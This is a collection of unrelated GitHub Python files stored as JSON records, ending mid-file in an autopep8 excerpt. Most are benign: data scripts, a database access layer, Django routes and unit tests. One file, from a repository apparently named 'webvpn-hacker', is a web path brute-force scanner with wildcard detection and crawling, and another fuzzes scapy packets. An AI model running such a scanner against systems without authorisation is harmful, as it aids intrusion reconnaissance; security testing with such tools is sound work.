open('../CSV_data/things_data.csv') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row[0] != \"level_id\":\n if \"level_\"+row[0] not in THI_DAT.keys():\n THI_DAT[\"level_\" + row[0]] = []\n THI_DAT[\"level_\"+row[0]].append({\n \"episode\": row[1],\n \"mission\": row[2],\n \"x_position\": row[3],\n \"y_position\": row[4],\n \"direction\": row[5],\n \"type\": row[6],\n \"flags\": row[7],\n })\n\nnew_things = {}\nunique_things = []\nnumber_of_things = {}\n\nfor i in range(1, 28):\n currLvl = \"level_\"+str(i)\n things = []\n wall_tex = []\n new_things[currLvl] = []\n for row in THI_DAT[currLvl]:\n t_is_new_thing = True\n t = row[\"type\"].upper()\n for v in new_things.values():\n if t in v:\n t_is_new_thing = False\n if t not in unique_things:\n unique_things.append(t)\n if t_is_new_thing:\n things.append(t)\n new_things[currLvl] += list(dict.fromkeys(things))\n\nunique_things.sort(key=int)\n\nfor i in range(1, 28):\n currLvl = \"level_\"+str(i)\n things = []\n wall_tex = []\n number_of_things[currLvl] = {}\n for thing in unique_things:\n number_of_things[currLvl][thing] = 0\n for row in THI_DAT[currLvl]:\n t = row[\"type\"].upper()\n number_of_things[currLvl][t] += 1\n\nnames = {\n \"level_1\": \"E1M1\",\n \"level_2\": \"E1M2\",\n \"level_3\": \"E1M3\",\n \"level_4\": \"E1M4\",\n \"level_5\": \"E1M5\",\n \"level_6\": \"E1M6\",\n \"level_7\": \"E1M7\",\n \"level_8\": \"E1M8\",\n \"level_9\": \"E1M9\",\n \"level_10\": \"E2M1\",\n \"level_11\": \"E2M2\",\n \"level_12\": \"E2M3\",\n \"level_13\": \"E2M4\",\n \"level_14\": \"E2M5\",\n \"level_15\": \"E2M6\",\n \"level_16\": \"E2M7\",\n \"level_17\": \"E2M8\",\n \"level_18\": \"E2M9\",\n \"level_19\": \"E3M1\",\n \"level_20\": \"E3M2\",\n \"level_21\": \"E3M3\",\n \"level_22\": \"E3M4\",\n \"level_23\": \"E3M5\",\n \"level_24\": \"E3M6\",\n \"level_25\": \"E3M7\",\n \"level_26\": \"E3M8\",\n \"level_27\": \"E3M9\",\n}\n\nwith open(resultdir+\"things_numbers.csv\", 'w', encoding='UTF-8') as outputFile:\n writer = csv.writer(outputFile)\n writer.writerow([\"level_id\", \"name\"]+unique_things)\n for key, row in number_of_things.items():\n writer.writerow([key, names[key]]+[v for v in row.values()])\n","repo_name":"DigitalDW/memoire_csv","sub_path":"data_analysis/things_numbers.py","file_name":"things_numbers.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14486219456","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom scapy.fields import *\nfrom scapy.packet import Packet, fuzz, Raw\nfrom cpf.misc.utils import hexdump\n\n\nclass Foo(Packet):\n fields_desc = [\n ByteField(\"type\", 0xff),\n StrFixedLenField(\"sep\", \"\\xaa\\xbb\", 2)\n ]\n\n def post_build(self, p, pay):\n l = len(pay)\n p = p[:1] + hex(l)[2:] + p[2:]\n return p + pay\n\n\nif __name__ == '__main__':\n p = Foo() / Raw(\"X\" * 32)\n hexdump(str(fuzz(p)))\n","repo_name":"hac425xxx/cpf","sub_path":"test/scapy/make_packet.py","file_name":"make_packet.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"15634548329","text":"import joblib\nimport numpy as np\nimport pandas as pd\nimport streamlit\n\nmodel = open(\".\\Streamlit-Deployment\\linear_regression_model_for_Streamlit.pkl\", \"rb\")\nlr_model = joblib.load(model)\n\ndef lr_prediction(alc, vol, sul, diol):\n pred_arr = np.array([alc, vol, sul, diol])\n preds = pred_arr.reshape(1, -1)\n preds = preds.astype(np.float64)\n model_prediction = lr_model.predict(preds)\n return model_prediction\n\n\ndef run():\n streamlit.title(\"Linear Regression Model Deployment\")\n html_temp = \"\"\"\n \"\"\"\n streamlit.markdown(html_temp)\n alc = streamlit.text_input(\"Alcohol\")\n vol = streamlit.text_input(\"volatile acidity\")\n sul = streamlit.text_input(\"sulphates\")\n dio = streamlit.text_input(\"total sulfur dioxide\")\n\n prediction = \"\"\n\n if streamlit.button(\"predict\"):\n prediction = lr_prediction(alc, vol, sul, dio)\n\n streamlit.success(\"The prediction by Model: {}\".format(prediction))\n\nif __name__ == \"__main__\":\n run()\n\n# 8.8, 0.27, 0.45, 45","repo_name":"pirate-datenscienticfic/100-Days-of-Machine-Learning","sub_path":"Streamlit-Deployment/LR_model/StreamlitApp.py","file_name":"StreamlitApp.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33824285143","text":"from connect_database import *\nfrom peewee import *\n\n\nclass BaseModel(Model):\n \"\"\"A base model that will use our Postgresql database\"\"\"\n\n def __str__(self):\n r = {}\n for k in self._data.keys():\n try:\n r[k] = str(getattr(self, k))\n except:\n r[k] = json.dumps(getattr(self, k))\n return str(r)\n\n class Meta:\n database = ConnectDatabase.db\n\n\n# class User(BaseModel):\n# username = CharField()\n# password = CharField()\n\n\nclass Common(BaseModel):\n description = CharField()\n position = IntegerField()\n\n\nclass Board(Common):\n title = CharField()\n date = CharField()\n # card = ForeignKeyField(Card, null=True)\n\n\nclass Card(Common):\n status = CharField()\n board = ForeignKeyField(Board)\n","repo_name":"CodecoolBP20162/web-with-python-proman-bugbusters","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2140241262","text":"# 버스 노선\n\nimport sys\ninput = sys.stdin.readline\n\nN = int(input().strip())\nM = int(input().strip())\nlines = [list(map(int, input().strip().split())) for _ in range(M)]\nstretch = []\nisokay = [True for _ in range(M+1)]\nisokay[0] = False\n\nfor i,v in enumerate(lines):\n if v[0] > v[1]:\n stretch.append((v[0],v[1]+N,i+1))\n else:\n stretch.append((v[0],v[1],i+1))\n stretch.append((v[0]+N, v[1]+N, i+1))\n\nstretch.sort(key=lambda line: (line[0], -line[1]))\n\nend = 0\nfor (a,b,i) in stretch:\n if b <= end:\n isokay[i] = False\n end = max(end, b)\n\nans = []\nfor i,v in enumerate(isokay):\n if v:\n ans.append(i)\n\nprint(\" \".join(map(str, ans)))\n# import sys\n# input = sys.stdin.readline\n\n# N = int(input())\n# M = int(input())\n# lines = [tuple(map(int, input().strip().split())) for _ in range(M)]\n# stretcheds = []\n\n# for i, (b, e) in enumerate(lines):\n# if b < e:\n# stretcheds.append((i+1, b, e))\n# stretcheds.append((i+1, b + N, e + N))\n# else:\n# stretcheds.append((i+1, b, e + N))\n\n# stretcheds.sort(key=lambda line: (line[1], -line[2]))\n\n# deleted = set()\n# most_far = 0\n# for i, b, e in stretcheds:\n# if e <= most_far:\n# deleted.add(i)\n# most_far = max(most_far, e)\n\n# ans = []\n# for i in range(1, M+1):\n# if i not in deleted:\n# ans.append(i)\n\n# print(*ans)","repo_name":"mi2ntae/Algorithm","sub_path":"python/2021/01-05/10165.py","file_name":"10165.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33348558638","text":"# day21\nfrom collections import Counter\nfrom collections import defaultdict\n\n\ndef allergen(input_str):\n lines = [line for line in input_str.split('\\n') if line]\n allergen_dict = defaultdict(list)\n all_ingredients = []\n for line in lines:\n ingredients = line.split('(')[0].strip().split()\n allergens = [\n item.strip(',')\n for item in line.split('(')[1].strip(')').split()[1:]\n ]\n all_ingredients += ingredients\n # print(ingredients)\n # print(allergens)\n for alg in allergens:\n allergen_dict[alg].append(set(ingredients))\n ingredients_counter = Counter(all_ingredients)\n allergen_dict_pruned = {\n key: set.intersection(*value)\n for key, value in allergen_dict.items()\n }\n # build the mapping from bottom up\n allergen_dict_final = {}\n confirmed_ingredients = set()\n while len(allergen_dict_final) < len(allergen_dict_pruned):\n for key, value in allergen_dict_pruned.items():\n if len(value) == 1:\n allergen_dict_final[key] = next(iter(value))\n confirmed_ingredients.add(next(iter(value)))\n allergen_dict_pruned = {\n key: value.difference(confirmed_ingredients)\n for key, value in allergen_dict_pruned.items()\n }\n\n count_no_known_allergen = sum([\n value for key, value in ingredients_counter.items()\n if key not in confirmed_ingredients\n ])\n algs = list(allergen_dict_final.keys())\n algs.sort()\n food = ','.join([allergen_dict_final[alg] for alg in algs])\n return count_no_known_allergen, food\n\n\ndef main():\n with open('./input_folder/day21.txt', encoding='UTF-8') as fh:\n input_text = fh.read()\n # part1 and part2\n count_no_known_allergen, food = allergen(input_text)\n assert count_no_known_allergen == 2230\n # part2\n assert food == 'qqskn,ccvnlbp,tcm,jnqcd,qjqb,xjqd,xhzr,cjxv'\n print('success!!')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nathan-zym268/aoc-2020","sub_path":"day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19110805593","text":"import datetime\nimport logging\nfrom typing import Optional\n\nimport pymysql\nfrom pymysql import err\n\nfrom src.config import config\nfrom src.db.entity import AnnouncementEntity, City, User, AnnouncementType, BlockedUser\n\n\ndef create_connection():\n return pymysql.connect(\n host=config.DB_HOST,\n port=config.DB_PORT,\n user=config.DB_USERNAME,\n passwd=config.DB_PASSWORD,\n database=config.DB_NAME,\n cursorclass=pymysql.cursors.DictCursor)\n\n\nADMIN_ID_MAX = 1000\n\n\nclass Dao:\n\n def __init__(self):\n self.connection = create_connection()\n\n def _select_one(self, query, parameters):\n try:\n with self.connection.cursor() as cursor:\n sql_query = query.replace(\"'\", \"\")\n logging.debug(f\"Execute 'select_one' query: {sql_query}\")\n logging.debug(f'Parameters: {parameters}')\n cursor.execute(sql_query, parameters)\n logging.debug(\"Successfully selected\")\n return cursor.fetchone()\n except Exception as e:\n logging.error(\"Exception in db:\", e)\n self.connection = create_connection()\n logging.info(\"Recreated connection\")\n return self._select_one(query, parameters)\n\n def _select_list(self, query, parameters) -> list:\n try:\n with self.connection.cursor() as cursor:\n sql_query = query.replace(\"'\", \"\")\n logging.debug(f\"Execute 'select_list' query: {sql_query}\")\n logging.debug(f'Parameters: {parameters}')\n cursor.execute(sql_query, parameters)\n logging.debug(\"Successfully selected\")\n return cursor.fetchall()\n except Exception as e:\n logging.error(\"Exception in db:\", e)\n self.connection = create_connection()\n logging.info(\"Recreated connection\")\n return self._select_list(query, parameters)\n\n def _execute(self, query, parameters):\n try:\n with self.connection.cursor() as cursor:\n sql_query = query.replace(\"'\", \"\")\n logging.debug(f\"Execute query: {sql_query}\")\n logging.debug(f'Parameters: {parameters}')\n cursor.execute(sql_query, parameters)\n logging.debug(\"Successfully executed\")\n self.connection.commit()\n except Exception as e:\n logging.error(\"Exception in db:\", e)\n self.connection = create_connection()\n logging.info(\"Recreated connection\")\n return self._execute(query, parameters)\n\n def close(self):\n logging.info(\"Closing connection\")\n try:\n self.connection.close()\n except err.Error as e:\n logging.info(f\"Exception during closing connection\", e)\n\n\nclass AnnouncementDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_ANNOUNCEMENT\n\n def save(self, ann: AnnouncementEntity, approved=True):\n logging.debug(f\"Create {ann.to_str()}\")\n query = f\"\"\"\n INSERT INTO `{self.__table}` \n (`id`, `user_id`, `a_type`, `a_service`, `city_from_id`, `city_to_id`, `info`, `scheduled`, `approved`) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s);\n \"\"\"\n self._execute(query,\n (ann.id, ann.user_id, ann.a_type.name, ann.a_service.name,\n ann.city_from_id, ann.city_to_id, ann.info, ann.scheduled, approved))\n\n def find(self, announcement_id: str) -> Optional[AnnouncementEntity]:\n logging.debug(f\"Find Announcement({announcement_id})\")\n query = f'SELECT * FROM `{self.__table}` WHERE id=%s;'\n r = self._select_one(query, announcement_id)\n return AnnouncementEntity.from_dict(r) if r else None\n\n def delete(self, announcement_id: str):\n logging.debug(f\"Delete Announcement({announcement_id})\")\n query = f'UPDATE `{self.__table}` SET approved = %s WHERE id=%s;'\n self._execute(query, (False, announcement_id))\n\n def find_by_user(self, user_id: int, approved=True) -> list:\n logging.debug(f\"Select all Announcements for User({user_id})\")\n query = f\"\"\"\n SELECT a.*, c.status, c.updated_at FROM `{self.__table}` AS a\n LEFT JOIN evacuation_call_status as c ON a.id = c.announcement_id\n WHERE user_id=%s and approved=%s ORDER BY created;\n \"\"\"\n result = self._select_list(query, (user_id, approved))\n logging.debug(f\"Selected {len(result)} Announcements for User({user_id})\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n def find_by_city(self, city_from_id: int, approved=True) -> list:\n logging.debug(f\"Select all Announcements for city {city_from_id}\")\n query = f\"\"\"\n SELECT a.*, c.status, c.updated_at FROM `{self.__table}` AS a\n LEFT JOIN evacuation_call_status as c ON a.id = c.announcement_id\n WHERE city_from_id=%s and approved=%s ORDER BY created;\n \"\"\"\n result = self._select_list(query, (city_from_id, approved))\n logging.debug(f\"Selected {len(result)} Announcements in city {city_from_id}\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n def find_all(self):\n logging.debug(f\"Select all Announcements\")\n query = f'SELECT * FROM `{self.__table}`;'\n result = self._select_list(query, ())\n logging.debug(f\"Selected {len(result)} Announcements\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n def count(self, a_type: AnnouncementType, from_date: datetime.date = None):\n logging.debug(f\"Find Announcements({a_type.name}) count from date - {from_date})\")\n from_date_condition = \"AND created > %s\" if from_date else \"\"\n from_date_parameters: tuple = (a_type, from_date) if from_date else (a_type.name)\n\n query = f'SELECT count(*) as res FROM `{self.__table}` WHERE a_type=%s {from_date_condition} AND approved=True;'\n r = self._select_one(query, from_date_parameters)\n return r['res'] if r else None\n\n def find_after(self, a_type: AnnouncementType, after_timestamp: datetime, approved=True):\n logging.debug(f\"Select all Announcements({a_type.name}) after_timestamp {after_timestamp}\")\n query = f'SELECT * FROM `{self.__table}` WHERE a_type=%s AND created >= %s AND user_id<=%s AND approved=%s ORDER BY created;'\n result = self._select_list(query, (a_type.name, after_timestamp, ADMIN_ID_MAX, approved))\n logging.debug(f\"Selected {len(result)} Announcements({a_type.name}) after_timestamp {after_timestamp}\")\n return [AnnouncementEntity.from_dict(r) for r in result]\n\n\nclass CityDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_CITY\n\n def save(self, city: City):\n logging.debug(f\"Save City({city.name})\")\n query = f\"\"\"\n INSERT INTO `{self.__table}` (`name`, `country`) \n VALUES (%s, %s);\n \"\"\"\n self._execute(query, (city.name, city.country))\n\n def find(self, city_id: int) -> Optional[City]:\n logging.debug(f\"Find City({city_id})\")\n query = f'SELECT * FROM `{self.__table}` WHERE id=%s;'\n r = self._select_one(query, city_id)\n return City.from_dict(r) if r else None\n\n def find_all(self) -> list:\n logging.debug(f\"Select all Cities\")\n query = f'SELECT * FROM `{self.__table}`;'\n result = self._select_list(query, ())\n logging.debug(f\"Selected {len(result)} Cities\")\n return [City.from_dict(r) for r in result]\n\n def find_by_name(self, city_name: str):\n logging.debug(f\"Find City({city_name})\")\n query = f'SELECT * FROM `{self.__table}` WHERE name=%s;'\n r = self._select_one(query, city_name)\n return City.from_dict(r) if r else None\n\n\nclass UserDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_USER\n\n def save(self, user: User):\n query = f\"\"\"\n INSERT INTO `{self.__table}` (`id`) \n VALUES (%s);\n \"\"\"\n self._execute(query, (user.id))\n\n def find(self, user_id: int) -> Optional[City]:\n logging.debug(f\"Find User({user_id})\")\n query = f'SELECT * FROM `{self.__table}` WHERE id=%s;'\n r = self._select_one(query, (user_id))\n return User.from_dict(r) if r else None\n\n def count(self, from_date: datetime.date = None):\n logging.debug(f\"Find Users count from date - {from_date})\")\n from_date_condition = \"WHERE created > %s\" if from_date else \"\"\n from_date_parameters: tuple = (from_date) if from_date else ()\n\n query = f'SELECT count(*) as res FROM `{self.__table}` {from_date_condition} ;'\n r = self._select_one(query, from_date_parameters)\n return r['res'] if r else None\n\n\nclass BlockedUserDao(Dao):\n def __init__(self):\n super().__init__()\n self.__table = config.DB_TABLE_BLOCKED_USER\n\n def find_all(self) -> list:\n logging.debug(f\"Select all BlockedUsers\")\n query = f'SELECT * FROM `{self.__table}`;'\n result = self._select_list(query, ())\n logging.debug(f\"Selected {len(result)} BlockedUsers\")\n return [BlockedUser.from_dict(r) for r in result]\n","repo_name":"VadymPolianskyi/ua-evacuation-bot","sub_path":"src/db/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":9306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4867618736","text":"import pandas as pd\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\npath= \"/home/mrov/Scrapy/scrapy/autoAm/autosAm/autosAm/all_data.csv\"\n\n\nif not os.path.exists():\n print(\"Error with loading file\")\n\ndf=pd.read_csv(\"all_data.csv\")\nprint(df.head())\n\nnumericDf = df.select_dtypes(include=np.number)\n\nnumericDf.plot(kind='scatter',x='mileage',y='price')\nplt.show()\n\ngroupingDf=df.groupby(\"year\")\nprint(numericDf.corr(method='pearson'))\nprices=df[\"price\"]\nprices.plot()\nplt.show()\n\nprint(\"The maximum price is \",df[\"price\"].max())\nprint(\"The minimum price is \",df[\"price\"].min())\n\nprint(\"The maximum mileage is \",df[\"mileage\"].max())\nprint(\"The minimum mileage is\",df[\"mileage\"].min())\n\nprint(\"On 2017 year prices are \")\nprint(df[df['year']==\"2017\"]['price'])","repo_name":"GrikTesaSystem/Autoam","sub_path":"preprocesData.py","file_name":"preprocesData.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27290549593","text":"\"\"\"conf URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom . import views\n\napp_name = 'recruiting'\n\nurlpatterns = [\n path('responses/', views.ResponseListView.as_view(), name='response_list'),\n path('responses/search/', views.ResponseListView.as_view(), name='response_list_search'),\n path('responses/notif/get/', views.get_notifications, name='get_notif'),\n path('responses/create//', views.ResponseCreateView.as_view(), name='response_create'),\n path('responses/create///', views.ResponseCreateView.as_view(), name='response_create_submit'),\n path('responses/accept//', views.response_accept, name='response_accept'),\n path('responses/reject//', views.response_reject, name='response_reject'),\n path('responses/delete//', views.ResponseDeleteView.as_view(), name='response_delete'),\n]\n","repo_name":"ruchej/gb_hh","sub_path":"hh/recruiting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32026932048","text":"from config.config import *\nconfig = getConfig()\nprefixes = [] if config['prefixes'] == \"[]\" else [i for i in config['prefixes'][1:-1].split(',')]\nsuffixes = [] if config['suffixes'] == \"[]\" else [i for i in config['suffixes'][1:-1].split(',')]\nextensions = [] if config['extensions'] == \"[]\" else [i for i in config['extensions'][1:-1].split(',')]\nthread_count = config['thread_count']\ncrawl = False if config['crawl'] == \"False\" else True\n\nfrom lib.scanner import Scanner\nfrom lib.crawl import Crawler\nfrom lib.utils import clean_path\n\nclass Fuzzer:\n def __init__(self, requester, dictionary, **kwargs):\n self._threads = []\n self._scanned = set()\n self._requester = requester\n self._dictionary = dictionary\n self._play_event = threading.Event()\n self._quit_event = threading.Event()\n self._pause_semaphore = threading.Semaphore(0)\n self._base_path = None\n self.exc = None\n self.match_callbacks = kwargs.get(\"match_callbacks\", [])\n self.not_found_callbacks = kwargs.get(\"not_found_callbacks\", [])\n self.error_callbacks = kwargs.get(\"error_callbacks\", [])\n\n def setup_scanners(self):\n self.scanners = {\"default\": {}, \"prefixes\": {}, \"suffixes\": {},}\n\n # Default scanners (wildcard testers)\n self.scanners[\"default\"].update({\n \"index\": Scanner(self._requester, path=self._base_path),\n \"random\": Scanner(self._requester, path=self._base_path + WILDCARD_TEST_POINT_MARKER),\n })\n\n for prefix in prefixes + DEFAULT_TEST_PREFIXES:\n self.scanners[\"prefixes\"][prefix] = Scanner(\n self._requester, tested=self.scanners,\n path=f\"{self._base_path}{prefix}{WILDCARD_TEST_POINT_MARKER}\",\n )\n\n for suffix in suffixes + DEFAULT_TEST_SUFFIXES:\n self.scanners[\"suffixes\"][suffix] = Scanner(\n self._requester, tested=self.scanners,\n path=f\"{self._base_path}{WILDCARD_TEST_POINT_MARKER}{suffix}\",\n )\n\n for extension in extensions:\n if \".\" + extension not in self.scanners[\"suffixes\"]:\n self.scanners[\"suffixes\"][\".\" + extension] = Scanner(\n self._requester, tested=self.scanners,\n path=f\"{self._base_path}{WILDCARD_TEST_POINT_MARKER}.{extension}\",\n )\n\n def setup_threads(self):\n if self._threads:\n self._threads = []\n\n for _ in range(thread_count):\n new_thread = threading.Thread(target=self.thread_proc)\n new_thread.daemon = True\n self._threads.append(new_thread)\n\n def get_scanners_for(self, path):\n path = clean_path(path)\n\n for prefix in self.scanners[\"prefixes\"]:\n if path.startswith(prefix):\n yield self.scanners[\"prefixes\"][prefix]\n\n for suffix in self.scanners[\"suffixes\"]:\n if path.endswith(suffix):\n yield self.scanners[\"suffixes\"][suffix]\n\n for scanner in self.scanners[\"default\"].values():\n yield scanner\n\n def start(self):\n self.setup_scanners()\n self.setup_threads()\n self.play()\n\n for thread in self._threads:\n thread.start()\n\n def is_finished(self):\n if self.exc:\n raise self.exc\n\n for thread in self._threads:\n if thread.is_alive():\n return False\n\n return True\n\n def play(self):\n self._play_event.set()\n\n def scan(self, path, scanners):\n if path in self._scanned:\n return\n else:\n self._scanned.add(path)\n\n response = self._requester.request(path)\n\n for tester in scanners:\n if not tester.check(path, response):\n for callback in self.not_found_callbacks:\n callback(response)\n return\n\n for callback in self.match_callbacks:\n callback(response)\n\n if crawl:\n for path_ in Crawler.crawl(response):\n if self._dictionary.is_valid(path_):\n self.scan(path_, self.get_scanners_for(path_))\n\n def set_base_path(self, path):\n self._base_path = path\n\n def thread_proc(self):\n while True:\n try:\n path = next(self._dictionary)\n scanners = self.get_scanners_for(path)\n self.scan(self._base_path + path, scanners)\n except StopIteration:\n break\n\n if not self._play_event.is_set():\n self._pause_semaphore.release()\n self._play_event.wait()\n\n","repo_name":"WD-2711/webvpn-hacker","sub_path":"lib/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"873213530","text":"from unittest import TestCase\nfrom unittest.mock import patch\nimport io\n\nimport game\n\n\nclass TestDescribeCurrentLocation(TestCase):\n @patch('sys.stdout', new_callable=io.StringIO)\n def test_describe_current_location_correct_print_output(self, mock_output):\n board = {(0, 0): 'Empty room', (0, 1): 'Dangerous room', (1, 0): 'Treasure room', (1, 1): 'Treasure room'}\n character = {'X-coordinate': 0, 'Y-coordinate': 0}\n game.describe_current_location(board, character)\n game_printed_this = mock_output.getvalue()\n expected = 'You are at (0, 0)\\nCurrent area is Empty room\\n'\n self.assertEqual(game_printed_this, expected)\n\n def test_describe_current_location_both_parameters_remain_unchanged(self):\n board = {(0, 0): 'Empty room', (0, 1): 'Dangerous room', (1, 0): 'Treasure room', (1, 1): 'Treasure room'}\n character = {'X-coordinate': 0, 'Y-coordinate': 0, 'Current HP': 5}\n game.describe_current_location(board, character)\n expected_board = {(0, 0): 'Empty room', (0, 1): 'Dangerous room', (1, 0): 'Treasure room',\n (1, 1): 'Treasure room'}\n expected_character = {'X-coordinate': 0, 'Y-coordinate': 0, 'Current HP': 5}\n self.assertEqual(expected_board, board)\n self.assertEqual(expected_character, character)","repo_name":"ws111994/SUD_Love_Adventure","sub_path":"test_describe_current_location.py","file_name":"test_describe_current_location.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41597613112","text":"import copy\nimport os\nimport sys\nimport inspect\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n try:\n from StringIO import StringIO\n except ImportError:\n from io import StringIO\nimport token\nimport tokenize\nfrom optparse import OptionParser\nfrom subprocess import Popen, PIPE\nfrom difflib import unified_diff\nimport tempfile\n\nfrom distutils.version import StrictVersion\ntry:\n import pep8\n if StrictVersion(pep8.__version__) < StrictVersion('1.3a2'):\n pep8 = None\nexcept ImportError:\n pep8 = None\n\n\n__version__ = '0.7.3'\n\n\nPEP8_BIN = 'pep8'\nPEP8_PASSES_MAX = 100\nCR = '\\r'\nLF = '\\n'\nCRLF = '\\r\\n'\nMAX_LINE_WIDTH = 79\n\n\ndef open_with_encoding(filename, encoding, mode='r'):\n \"\"\"Return opened file with a specific encoding.\"\"\"\n try:\n # Python 3\n return open(filename, mode=mode, encoding=encoding)\n except TypeError:\n return open(filename, mode=mode)\n\n\ndef detect_encoding(filename):\n \"\"\"Return file encoding.\"\"\"\n try:\n # Python 3\n try:\n with open(filename, 'rb') as input_file:\n encoding = tokenize.detect_encoding(input_file.readline)[0]\n\n # Check for correctness of encoding\n import io\n with io.TextIOWrapper(input_file, encoding) as wrapper:\n wrapper.read()\n\n return encoding\n except (SyntaxError, LookupError, UnicodeDecodeError):\n return 'latin-1'\n except AttributeError:\n return 'utf-8'\n\n\ndef read_from_filename(filename, readlines=False):\n \"\"\"Return contents of file.\"\"\"\n with open_with_encoding(filename,\n encoding=detect_encoding(filename)) as input_file:\n return input_file.readlines() if readlines else input_file.read()\n\n\nclass FixPEP8(object):\n\n \"\"\"Fix invalid code.\n\n Fixer methods are prefixed \"fix_\". The _fix_source() method looks for these\n automatically.\n\n The fixer method can take either one or two arguments (in addition to\n self). The first argument is \"result\", which is the error information from\n pep8. The second argument, \"logical\", is required only for logical-line\n fixes.\n\n The fixer method can return the list of modified lines or None. An empty\n list would mean that no changes were made. None would mean that only the\n line reported in the pep8 error was modified. Note that the modified line\n numbers that are returned are indexed at 1. This typically would correspond\n with the line number reported in the pep8 error information.\n\n [fixed method list]\n - e111\n - e121,e122,e123,e124,e125,e126,e127,e128\n - e201,e202,e203\n - e211\n - e221,e222,e223,e224,e225\n - e231\n - e251\n - e261,e262\n - e271,e272,e273,e274\n - e301,e302,e303\n - e401\n - e502\n - e701,e702\n - e711\n - e721\n - w291,w293\n - w391\n - w602,w603,w604\n\n \"\"\"\n\n def __init__(self, filename, options, contents=None):\n self.filename = filename\n if contents is None:\n self.source = read_from_filename(filename, readlines=True)\n else:\n sio = StringIO(contents)\n self.source = sio.readlines()\n self.original_source = copy.copy(self.source)\n self.newline = find_newline(self.source)\n self.options = options\n self.indent_word = _get_indentword(\"\".join(self.source))\n self.logical_start = None\n self.logical_end = None\n # method definition\n self.fix_e111 = self.fix_e101\n self.fix_e128 = self.fix_e127\n self.fix_e202 = self.fix_e201\n self.fix_e203 = self.fix_e201\n self.fix_e211 = self.fix_e201\n self.fix_e221 = self.fix_e271\n self.fix_e222 = self.fix_e271\n self.fix_e223 = self.fix_e271\n self.fix_e241 = self.fix_e271\n self.fix_e242 = self.fix_e224\n self.fix_e261 = self.fix_e262\n self.fix_e272 = self.fix_e271\n self.fix_e273 = self.fix_e271\n self.fix_e274 = self.fix_e271\n self.fix_w191 = self.fix_e101\n\n def _fix_source(self, results):\n completed_lines = set()\n for result in sorted(results, key=_priority_key):\n if result['line'] in completed_lines:\n continue\n\n fixed_methodname = \"fix_%s\" % result['id'].lower()\n if hasattr(self, fixed_methodname):\n fix = getattr(self, fixed_methodname)\n\n is_logical_fix = len(inspect.getargspec(fix).args) > 2\n if is_logical_fix:\n # Do not run logical fix if any lines have been modified.\n if completed_lines:\n continue\n\n logical = self._get_logical(result)\n if not logical:\n continue\n\n modified_lines = fix(result, logical)\n else:\n modified_lines = fix(result)\n\n if modified_lines:\n completed_lines.update(modified_lines)\n elif modified_lines == []: # Empty list means no fix\n if self.options.verbose:\n sys.stderr.write('Not fixing {f} on line {l}\\n'.format(\n f=result['id'], l=result['line']))\n else: # We assume one-line fix when None\n completed_lines.add(result['line'])\n else:\n if self.options.verbose:\n sys.stderr.write(\"'%s' is not defined.\\n\" %\n fixed_methodname)\n info = result['info'].strip()\n sys.stderr.write(\"%s:%s:%s:%s\\n\" % (self.filename,\n result['line'],\n result['column'],\n info))\n\n def fix(self):\n \"\"\"Return a version of the source code with PEP 8 violations fixed.\"\"\"\n if pep8:\n pep8_options = {\n 'ignore':\n self.options.ignore and self.options.ignore.split(','),\n 'select':\n self.options.select and self.options.select.split(','),\n }\n results = _execute_pep8(pep8_options, self.source)\n else:\n if self.options.verbose:\n sys.stderr.write('Running in compatibility mode. Consider '\n 'upgrading to the latest pep8.\\n')\n results = _spawn_pep8(([\"--ignore=\" + self.options.ignore]\n if self.options.ignore else []) +\n ([\"--select=\" + self.options.select]\n if self.options.select else []) +\n [self.filename])\n self._fix_source(results)\n return \"\".join(self.source)\n\n def fix_e101(self, _):\n 